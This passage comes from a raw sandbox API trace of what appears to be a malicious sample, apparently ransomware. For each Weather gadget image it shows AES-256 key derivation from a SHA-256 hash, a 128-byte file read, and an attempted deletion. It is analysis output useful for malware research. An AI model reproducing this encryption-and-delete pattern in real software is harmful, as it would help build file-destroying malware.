lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.859] CryptDestroyHash (hHash=0x284d528) returned 1 [0194.859] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.859] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.861] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\46.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\46.png")) returned 0 [0194.861] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.862] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.862] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.862] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.862] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1456 [0194.862] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.874] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0194.874] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.874] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.876] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\47.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\47.png")) returned 0 [0194.877] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.877] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.877] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.877] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.877] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1701 [0194.878] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.881] CryptDestroyHash (hHash=0x284d528) returned 1 [0194.881] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.881] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.882] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\5.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\5.png")) returned 0 [0194.883] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.884] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.884] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.884] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.884] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1701 [0194.884] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.888] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0194.888] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.888] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.889] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\6.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\6.png")) returned 0 [0194.890] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.890] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.890] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.890] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.890] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1701 [0194.890] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.909] CryptDestroyHash (hHash=0x284d528) returned 1 [0194.909] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.909] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.910] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\7.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\7.png")) returned 0 [0194.911] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.911] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.911] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.911] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.911] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1551 [0194.911] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.914] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0194.914] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.914] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.915] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\8.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\8.png")) returned 0 [0195.030] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.031] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.031] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.031] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.031] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1551 [0195.031] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.035] CryptDestroyHash (hHash=0x284d528) returned 1 [0195.035] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.035] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.037] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\9.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\9.png")) returned 0 [0195.038] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.038] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.038] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.038] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.038] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3032 [0195.039] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.042] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0195.042] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.042] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.045] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\activity16v.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\activity16v.png")) returned 0 [0195.046] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.047] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.047] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.047] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.047] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1aa [0195.047] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.049] CryptDestroyHash (hHash=0x284d528) returned 1 [0195.049] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.049] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.050] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\alertIcon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\alerticon.png")) returned 0 [0195.051] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.051] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.052] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.052] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.052] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xcde [0195.052] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.056] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0195.056] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.056] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.057] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_down.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_close_down.png")) returned 0 [0195.059] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.059] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.059] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.059] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.059] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xcdf [0195.059] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.062] CryptDestroyHash (hHash=0x284d528) returned 1 [0195.062] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.062] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.064] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_down_BIDI.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_close_down_bidi.png")) returned 0 [0195.065] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.065] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.065] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.065] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.065] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xcdb [0195.065] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.102] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0195.102] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.102] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.104] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_over.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_close_over.png")) returned 0 [0195.141] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.142] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.142] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.142] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.142] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xca8 [0195.142] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.144] CryptDestroyHash (hHash=0x284d528) returned 1 [0195.144] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.144] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.146] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_up.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_close_up.png")) returned 0 [0195.146] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.147] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.147] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.147] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.147] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xdf5 [0195.147] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.149] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0195.149] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.149] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.151] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_down.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_down.png")) returned 0 [0195.152] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.153] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.153] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.153] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.153] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xdfd [0195.153] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.156] CryptDestroyHash (hHash=0x284d528) returned 1 [0195.156] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.156] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.157] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_down_BIDI.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_down_bidi.png")) returned 0 [0195.158] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.158] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.158] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.158] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.158] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xde7 [0195.158] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.161] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0195.161] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.161] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.163] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_over.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_over.png")) returned 0 [0195.164] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.164] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.165] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.165] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.165] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xdfe [0195.165] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.170] CryptDestroyHash (hHash=0x284d528) returned 1 [0195.170] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.170] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.172] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_over_BIDI.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_over_bidi.png")) returned 0 [0195.172] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.173] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.173] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.173] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.173] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd68 [0195.173] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.176] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0195.176] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.176] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.177] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_up.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_up.png")) returned 0 [0195.179] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.179] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.180] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.180] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.180] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd80 [0195.180] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.187] CryptDestroyHash (hHash=0x284d528) returned 1 [0195.188] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.188] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.189] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_up_BIDI.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_up_bidi.png")) returned 0 [0195.190] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.191] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.191] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) 